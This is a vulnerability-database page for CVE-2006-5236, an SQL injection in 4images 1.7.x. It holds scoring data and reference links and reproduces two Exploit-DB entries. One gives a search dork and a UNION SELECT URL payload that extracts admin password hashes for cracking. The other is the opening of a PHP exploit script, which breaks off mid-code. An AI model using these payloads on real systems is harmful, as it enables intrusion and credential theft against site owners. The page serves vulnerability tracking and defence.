CVE-2006-5236
published 2006-10-11CVE-2006-5236: SQL injection vulnerability in search.php in 4images 1.7.x allows remote authenticated users to execute arbitrary SQL commands via the search_user parameter.
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.01%
78.4th percentile
SQL injection vulnerability in search.php in 4images 1.7.x allows remote authenticated users to execute arbitrary SQL commands via the search_user parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 4homepages | 4images | — | — |
| 4homepages | 4images | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
4Images 1.7.1 - SQL Injection
exploitdb·2009-12-20
CVE-2006-5236 4Images 1.7.1 - SQL Injection
4Images 1.7.1 - SQL Injection
---
# Exploit Title: 4images 1.7.1 Remote SQL Injection Vulnerability
# Date: 20-12-2009
# Author: Master Mind
# Version: 1.7.1
# CVE : [N/A]
~ Script Name : 4images 1.7.1
~ Language : php
~ Author : Master Mind
~ Home : www.shdowskill.com , www.vbspiders.com
Dork : Powered By: 4images 1.7.1
./Exploit:
first search for the admin username :
ex : http://[Target.com]/path/member.php?action=showprofile&user_id=1
now we have the admin username
now we will find the password :]
ex : http://[Target.com]/path/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%2$
admin = admin username
Crack the MD5 Hash and Enjoy :)
admin panel path : http://[Target.com]/path/admin
--------------------------------------------------
Exploit-DB
4Images 1.7.x - 'search.php' SQL Injection
exploitdb·2006-10-08
CVE-2006-5236 4Images 1.7.x - 'search.php' SQL Injection
4Images 1.7.x - 'search.php' SQL Injection
---
#!/usr/bin/php
//search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527ADMIN
[w4ck1ng] - w4ck1ng.com
*/
if(!$argv[3]){
die("Usage:
php $argv[0] [host] [path] [options] [table prefix] [user id]\n
Options:
-d: Determine table prefix\n
Example:
php $argv[0] domain.com /4images/ 4images_ 1
php $argv[0] domain.com /4images/ -d\n");
}
if(eregi("http://", $argv[1])){
die("Usage:
php $argv[0] [host] [path] [options] [table prefix] [user id]\n
Options:
-d: Determine table prefix\n
Example:
php $argv[0] domain.com /4images/ 4images_ 1
php $argv[0] domain.com /4images/ -d\n");
}
if($argv[3]=="-d"){
$pipe = fsockopen($argv[1],80);
if(!$pipe){
die("Cannot connect to host.");
} else {
$sql = "x%27"
No writeups or analysis indexed.
http://secunia.com/advisories/22349http://securityreason.com/securityalert/1711http://securitytracker.com/id?1017074http://w4ck1ng.com/board/showthread.php?t=1037http://www.securityfocus.com/archive/1/448022/100/0/threadedhttp://www.securityfocus.com/bid/20394http://www.vupen.com/english/advisories/2006/3974https://exchange.xforce.ibmcloud.com/vulnerabilities/29389https://www.exploit-db.com/exploits/2487http://secunia.com/advisories/22349http://securityreason.com/securityalert/1711http://securitytracker.com/id?1017074http://w4ck1ng.com/board/showthread.php?t=1037http://www.securityfocus.com/archive/1/448022/100/0/threadedhttp://www.securityfocus.com/bid/20394http://www.vupen.com/english/advisories/2006/3974https://exchange.xforce.ibmcloud.com/vulnerabilities/29389https://www.exploit-db.com/exploits/2487
2006-10-11
Published